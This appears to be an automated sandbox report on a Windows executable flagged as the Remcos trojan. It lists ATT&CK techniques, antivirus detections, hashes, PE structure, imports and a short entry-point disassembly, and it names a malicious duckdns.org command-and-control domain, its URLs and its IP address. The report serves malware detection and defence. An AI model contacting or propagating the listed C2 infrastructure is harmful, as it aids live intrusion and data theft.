                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\vOj00hEkoQ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		OS Credential Dumping1
                Query Registry                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Obfuscated Files or Information                		LSASS Memory1
                System Information Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
                Non-Application Layer Protocol                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
                Remote System Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
                Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
                Ingress Tool Transfer                		SIM Card SwapCarrier Billing Fraud

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                vOj00hEkoQ.exe77%VirustotalBrowse
                vOj00hEkoQ.exe49%MetadefenderBrowse
                vOj00hEkoQ.exe58%ReversingLabsWin32.Trojan.Remcos
                vOj00hEkoQ.exe100%AviraTR/Agent.afak

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                aubromaterkiddie.duckdns.org7%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.pregrad.netopenU0%Avira URL Cloudsafe
                https://aubromaterkiddie.duckdns.org/S100%Avira URL Cloudmalware
                http://www.emerge.de0%VirustotalBrowse
                http://www.emerge.de0%Avira URL Cloudsafe
                https://aubromaterkiddie.duckdns.org/typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm100%Avira URL Cloudmalware
                http://www.pregrad.net0%Avira URL Cloudsafe
                https://aubromaterkiddie.duckdns.org/typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsu100%Avira URL Cloudmalware
                http://www.emerge.deDVarFileInfo$0%Avira URL Cloudsafe
                https://aubromaterkiddie.duckdns.org/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                aubromaterkiddie.duckdns.org
                		208.67.105.81
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://aubromaterkiddie.duckdns.org/typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajmtrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.pregrad.netopenUvOj00hEkoQ.exe, 00000000.00000003.384404649.00000000047FB000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.489464514.0000000005868000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.369993368.0000000005470000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.418411643.000000000586E000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.444314708.0000000005380000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.468202246.0000000005379000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.446198402.0000000005459000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.407097431.0000000004970000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.419436006.0000000005894000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.380813419.00000000047D4000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.490854963.0000000005867000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.388270798.0000000004688000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.456730184.0000000005481000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.467333094.0000000005480000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.461723377.0000000005498000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.373822199.0000000005374000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.371871713.000000000547C000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.361939985.0000000004970000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.536696915.0000000000810000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.521065189.0000000005840000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aubromaterkiddie.duckdns.org/SvOj00hEkoQ.exe, 00000000.00000003.534041371.00000000006E5000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.emerge.devOj00hEkoQ.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.pregrad.netvOj00hEkoQ.exe, vOj00hEkoQ.exe, 00000000.00000003.384404649.00000000047FB000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.489464514.0000000005868000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.369993368.0000000005470000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.418411643.000000000586E000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.444314708.0000000005380000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.468202246.0000000005379000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.446198402.0000000005459000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.407097431.0000000004970000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.419436006.0000000005894000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.380813419.00000000047D4000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.490854963.0000000005867000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.388270798.0000000004688000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.456730184.0000000005481000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.467333094.0000000005480000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.461723377.0000000005498000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.373822199.0000000005374000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.371871713.000000000547C000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.361939985.0000000004970000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.536696915.0000000000810000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aubromaterkiddie.duckdns.org/typmpustomsspyheeueheheupoawymopustysom/GrxxswfwhjfzuxjvaphlnsuvOj00hEkoQ.exe, 00000000.00000003.454813082.00000000006D9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.emerge.deDVarFileInfo$vOj00hEkoQ.exe, 00000000.00000003.384404649.00000000047FB000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.465785488.0000000004983000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.409891925.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.448677572.0000000004F86000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.400527616.0000000004780000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.399459326.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.378316634.0000000004686000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.492078319.000000000583C000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.373258342.000000000540C000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.511111350.0000000005838000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.496618464.0000000005828000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.447679692.0000000005554000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.492490085.0000000000729000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.562147869.00000000007E1000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.418411643.000000000586E000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.538463758.00000000007A1000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.560338618.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.423477581.0000000005280000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.392588116.0000000004686000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.468202246.0000000005379000.00000004.00001000.00020000.00000000.sdmp, vOj00hEkoQ.exe, 00000000.00000003.387394358.00000000047D0000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                https://aubromaterkiddie.duckdns.org/vOj00hEkoQ.exe, 00000000.00000003.372603589.00000000006E5000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                208.67.105.81
                		aubromaterkiddie.duckdns.orgUnited States
                		20042GRAYSON-COLLIN-COMMUNICATIONSUStrue

                General Information

                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679209
                Start date and time: 05/08/202212:09:192022-08-05 12:09:19 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 42s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:vOj00hEkoQ (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.troj.winEXE@1/0@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 20.54.89.106
                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Execution Graph export aborted for target vOj00hEkoQ.exe, PID 1328 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:10:26API Interceptor187x Sleep call for process: vOj00hEkoQ.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.96987317587864
                TrID:
                • Win32 Executable (generic) a (10002005/4) 90.27%
                • Win32 Executable Borland Delphi 7 (665061/41) 6.00%
                • Win32 Executable Borland Delphi 6 (262906/60) 2.37%
                • Windows ActiveX control (116523/4) 1.05%
                • Win32 Executable Delphi generic (14689/80) 0.13%
                File name:vOj00hEkoQ.exe
                File size:1009664
                MD5:17e836d33b139295b876b1a3b6a23299
                SHA1:dc99e2695b030dcd66fff58e2fe1254c5ceffe21
                SHA256:3dd8bf8cb0353e84983445dded6e0a42427d5adce1bae358c3cc692793530615
                SHA512:f288da05f169db3dd1f7c2937b27374873f551f0c77813b7bf5266cc9241e333ffd1d7993b184ef6271d96606a64fc62a668fe4c506ad0d0d2265e924f004b48
                SSDEEP:24576:5DA1mchKTwkH17WtMBhiUDxvHiMYStUtVSn52pAf2rDNtl2aCHX:5Dhc8ZPbVI5Sn52KN
                TLSH:51259D21F6E24433C173377C5E5B46A59939BE103A78D88A3BE92D981FFD68178342C6
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:c49af2e8ece0e6c8

                Static PE Info

                General

                Entrypoint:0x4a3b74
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:205f6434858f3f8cc9e8b96d094507a2

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFF0h
                mov eax, 004A38D4h
                call 00007F17B4C106A1h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007F17B4C713E1h
                mov ecx, dword ptr [004A59E0h]
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                mov edx, dword ptr [004A0C1Ch]
                call 00007F17B4C713E1h
                mov eax, dword ptr [004A59E0h]
                mov eax, dword ptr [eax]
                call 00007F17B4C6DE55h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007F17B4C71449h
                call 00007F17B4C0E104h
                lea eax, dword ptr [eax+00h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xa70000x27a4.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x43000.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc1ec.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xab0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000xa2bc80xa2c00False0.5100101406490015data6.535344306379752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa40000x1aa40x1c00False0.42703683035714285data4.101220909917565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xa60000xef50x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xa70000x27a40x2800False0.3671875data5.001062777293974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xaa0000x400x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xab0000x180x200False0.05078125data0.2005819074398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xac0000xc1ec0xc200False0.5179606958762887data6.616954325025841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0xb90000x430000x43000False0.5516047691231343data7.262575014709826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                AUDIOES0xb9d880x3697cRIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 HzEnglishUnited States
                RT_CURSOR0xf07040x134data
                RT_CURSOR0xf08380x134data
                RT_CURSOR0xf096c0x134data
                RT_CURSOR0xf0aa00x134data
                RT_CURSOR0xf0bd40x134data
                RT_CURSOR0xf0d080x134data
                RT_CURSOR0xf0e3c0x134data
                RT_BITMAP0xf0f700x1d0data
                RT_BITMAP0xf11400x1e4data
                RT_BITMAP0xf13240x1d0data
                RT_BITMAP0xf14f40x1d0data
                RT_BITMAP0xf16c40x1d0data
                RT_BITMAP0xf18940x1d0data
                RT_BITMAP0xf1a640x1d0data
                RT_BITMAP0xf1c340x1d0data
                RT_BITMAP0xf1e040x1d0data
                RT_BITMAP0xf1fd40x1d0data
                RT_BITMAP0xf21a40xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                RT_ICON0xf228c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                RT_ICON0xf48340x988data
                RT_ICON0xf51bc0x468GLS_BINARY_LSB_FIRST
                RT_DIALOG0xf56240x52data
                RT_STRING0xf56780x114data
                RT_STRING0xf578c0x3d0data
                RT_STRING0xf5b5c0x554data
                RT_STRING0xf60b00x3ccdata
                RT_STRING0xf647c0x1d4data
                RT_STRING0xf66500x180data
                RT_STRING0xf67d00x314COM executable for DOS
                RT_STRING0xf6ae40x4f4data
                RT_STRING0xf6fd80x1c0data
                RT_STRING0xf71980xecdata
                RT_STRING0xf72840x134data
                RT_STRING0xf73b80x314data
                RT_STRING0xf76cc0x40cdata
                RT_STRING0xf7ad80x380data
                RT_STRING0xf7e580x3d4data
                RT_STRING0xf822c0x250data
                RT_STRING0xf847c0xecdata
                RT_STRING0xf85680x1dcdata
                RT_STRING0xf87440x3ecdata
                RT_STRING0xf8b300x3f4data
                RT_STRING0xf8f240x30cdata
                RT_STRING0xf92300x328data
                RT_RCDATA0xf95580x10data
                RT_RCDATA0xf95680x370data
                RT_RCDATA0xf98d80x16adDelphi compiled form 'TForm1'
                RT_RCDATA0xfaf880x2c3Delphi compiled form 'TForm2'
                RT_RCDATA0xfb24c0x39eDelphi compiled form 'TForm3'
                RT_RCDATA0xfb5ec0x2d0Delphi compiled form 'TForm4'
                RT_GROUP_CURSOR0xfb8bc0x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8d00x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8e40x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8f80x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb90c0x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb9200x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb9340x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_ICON0xfb9480x30data
                RT_VERSION0xfb9780x498dataGermanGermany

                Imports

                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
